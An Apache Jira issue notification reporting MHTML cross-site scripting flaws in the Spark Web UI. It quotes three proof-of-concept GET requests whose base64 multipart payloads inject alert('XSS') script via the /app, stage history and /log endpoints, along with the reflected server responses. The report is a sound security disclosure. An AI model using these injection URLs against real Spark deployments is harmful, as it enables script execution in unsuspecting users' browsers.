Nicholas Marion created SPARK-20393:
---------------------------------------
Summary: Strengthen Spark to prevent XSS vulnerabilities
Key: SPARK-20393
URL: https://issues.apache.org/jira/browse/SPARK-20393
Project: Spark
Issue Type: Bug
Components: Web UI
Affects Versions: 2.1.0, 2.0.2, 1.5.2
Reporter: Nicholas Marion
Using IBM Security AppScan Standard, we discovered several easy to recreate
MHTML cross site scripting vulnerabilities in the Apache Spark Web GUI
application and these vulnerabilities were found to exist in Spark version
1.5.2 and 2.0.2, the two levels we initially tested. Cross-site scripting
attack is not really an attack on the Spark server as much as an attack on the
end user, taking advantage of their trust in the Spark server to get them to
click on a URL like the ones in the examples below. So whether the user could
or could not change lots of stuff on the Spark server is not the key point. It
is an attack on the user themselves. If they click the link the script could
run in their browser and comprise their device. Once the browser is
compromised it could submit Spark requests but it also might not.
https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/
{quote}
Request: GET
/app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
HTTP/1.1
Excerpt from response: <div class="row-fluid">No running application with ID
Content-Type: multipart/related;
boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
</div>
Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>
Request: GET
/history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
Location:foo%0d%0aContent-Transfer-
Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
k.pageSize=100 HTTP/1.1
Excerpt from response: Content-Type: multipart/related;
boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>
Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
Location:foo%0d%0aContent-Transfer-
Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
eLength=0 HTTP/1.1
Excerpt from response: ==== Bytes 0-0 of 0 of
/u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
Type: multipart/related; boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>
{quote}
security@apache was notified and recommended a PR.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org
